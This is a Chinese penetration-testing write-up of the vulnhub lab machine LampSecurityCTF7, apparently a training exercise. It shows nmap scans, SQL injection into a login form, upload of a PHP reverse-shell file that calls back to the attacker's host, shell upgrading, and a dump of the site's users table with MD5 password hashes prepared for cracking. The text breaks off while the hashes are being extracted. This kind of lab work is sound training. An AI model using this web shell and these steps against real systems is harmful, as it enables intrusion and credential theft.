LampSecurityCTF7 靶机渗透 (sql 注入, 文件上传, 密码喷射)

news2024/11/6 3:09:01

靶机介绍

LampSecurityCTF7,vulnhub 靶机

主机发现

由于靶机配置问题,扫不到 ip

这里需要特别注意一下,在第一次启动打开靶机的时候,vmware会跳出一个提示框,让你选择我已复制该虚拟机/我已移动该虚拟机,一定要选择移动,用移动的方式网络环境会完整复现。否则有可能在主机发现的时候扫描不到这个靶机。如果后续发现真的出现了无法主机发现,莫慌,重装一下就行了。
(https://blog.csdn.net/Bossfrank/article/details/131324929)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds


┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds


漏洞脚本扫描(扫描很慢,不知道为啥)

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum: 
|_  /login.php: Possible admin folder
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds


web 渗透

在这里插入图片描述注入试试
在这里插入图片描述
8080 端口尝试注一下,没能成,似乎是数据库版本的注释有点问题,有报错信息,可以看一下
在这里插入图片描述这样注入能成
在这里插入图片描述有上传,考虑传个马

在这里插入图片描述

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
   

下一步找 shell.php 的位置,让他向 kali 弹 shell
扫目录,其中 asset 中看到上传文件

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/                                              
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)                                                                                                        
==> DIRECTORY: http://192.168.50.156/assets/                                                                                                              
+ http://192.168.50.156/backups (CODE:301|SIZE:333)                                                                                                       
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)                                                                                                      
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)                                                                                                      
==> DIRECTORY: http://192.168.50.156/css/                                                                                                                 
+ http://192.168.50.156/db (CODE:200|SIZE:3904)                                                                                                           
+ http://192.168.50.156/default (CODE:200|SIZE:6058)                                                                                                      
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)                                                                                                       
+ http://192.168.50.156/header (CODE:200|SIZE:3904)                                                                                                       
==> DIRECTORY: http://192.168.50.156/img/                                                                                                                 
==> DIRECTORY: http://192.168.50.156/inc/                                                                                                                 
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)                                                                                                    
==> DIRECTORY: http://192.168.50.156/js/                                                                                                                  
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)                                                                                                   
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)                                                                                                     
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)                                                                                                      
+ http://192.168.50.156/read (CODE:302|SIZE:1)                                                                                                            
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)                                                                                                     
+ http://192.168.50.156/register (CODE:200|SIZE:6591)                                                                                                     
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)                                                                                                       
+ http://192.168.50.156/usage (CODE:403|SIZE:287)                                                                                                         
==> DIRECTORY: http://192.168.50.156/webalizer/                                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/                                                                                                             
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)                                                                                         
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)                                                                                          
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/installer/                                                                                                   
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)                                                                                               
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)                                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/plugins/                                                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/program/                                                                                                     
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/skins/                                                                                                       
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)                                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/                                                                                            
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)                                                                                     
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/                                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/                                                                                            
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.                                                                                      
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/                                                                                               
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/installer/images/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/                                                                                       
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/                                                                                          
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/                                                                                    
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/                                                                                    
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)                                                                             
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/                                                                                      
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/                                                                                     
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/                                                                               
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/                                                                                
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/                                                                                  
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/                                                                        
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ ----
                                                                                                                                                          
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----
                                                                               /zt                                                                        
-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32

点击 shell.php ,发现服务器可以解析,服务器执行php,kali 拿到 shell
在这里插入图片描述

初级 shell

看一下基础信息

bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$ 

使用 python 升级 shell
尝试查看当前用户权限发现需要一个类似凭证的密码,这个密码目前没拿到

bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for apache: exit

Sorry, try again.
[sudo] password for apache: root

Sorry, try again.
[sudo] password for apache: admin

Sorry, try again.
sudo: 3 incorrect password attempts

搞一搞内网信息收集

bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www    
cd /var/www
bash-4.1$ ls
ls
admin  cgi-bin  error  html  icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs          index.php   newsletters.php  reservations.php
feedback.php  login.php   phpmyadmin       trainings.php
inc           logout.php  readings.php     users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19  2012 .
259983 drwxr-xr-x. 7 root   root   4.0K Dec 19  2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24  2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 inc
260351 -rw-r--r--. 1 webdev webdev  314 Dec 24  2012 index.php
260442 -rw-rw-r--. 1 webdev webdev  885 Dec 24  2012 login.php
260445 -rw-rw-r--. 1 webdev webdev  236 Dec 24  2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24  2012 newsletters.php
270632 drwxr-xr-x. 9 root   root   4.0K Dec 19  2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24  2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24  2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24  2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24  2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php  admin_header.php  base.php  db.php
bash-4.1$ 

找到了一个数据库连接文件


bash-4.1$ cat db.php
cat db.php
<?php
/**
 * This file is part of the LAMPSecurity CTF 7
 * http://sourceforge.net/projects/lampsecurity
 * by Justin C. Klein Keane
 */

class DatabaseConnection {
        public function __construct() {
                $this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
                if (!$this->conn) die('Could not connect: ' . mysql_error());
                mysql_select_db('website');
        }
        public function query($query) {
                $result = mysql_query($query);
                if (!$result) {
                        $message  = 'Invalid query: ' . mysql_error() . "\n";
        $message .= 'Whole query: ' . $query;
        die($message);
                }
                $retval = array();
                while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
                return $retval;
        }
}

function dbin($string) {
        return mysql_real_escape_string($string);
}

$db = new DatabaseConnection();bash-4.1$ 

登录 mysql (mysql 的操作回显等对 shell 交互性有有要求,连接 shell 后用 python 升级 shell 是一般的操作)

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distribution

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 


查看数据库的内容

mysql> 

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)

mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)

mysql>      

看一看 users 表的内容

mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username                      | password                         | is_admin | last_login          | user_id | realname        | profile                                                                  |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |        1 | 2012-12-19 11:30:54 |       3 | Brian Hershel   | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |        1 | NULL                |       4 | John Durham     |                                                                          |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |        1 | NULL                |       5 | Alice Wonder    |                                                                          |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |        1 | NULL                |       6 | Ruby Spinster   |                                                                          |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |        1 | NULL                |       7 | Leon Parnetta   |                                                                          |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |        1 | NULL                |       8 | Julia Fields    |                                                                          |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |        0 | NULL                |       9 | Michael Saint   |                                                                          |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |        0 | NULL                |      10 | Bruce Pottricks |                                                                          |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |        0 | NULL                |      11 | Neil Felstein   |                                                                          |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |        0 | NULL                |      12 | Charles Adams   |                                                                          |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |        0 | NULL                |      36 |                 |                                                                          |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |        0 | NULL                |     113 |                 |                                                                          |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)

破解 md5 的密文


mysql> select username,password from users
select username,password from users
    -> ;
;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)

mysql> 


把用户名和密码拿到本机,先拿 awk 处理一下

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst  
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |


用 awk 处理一下用户名,写道一个文件里 users.lst (红笔特有的精细操作)

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali: 
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst 
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

把哈希拿出来

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst                                                                
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
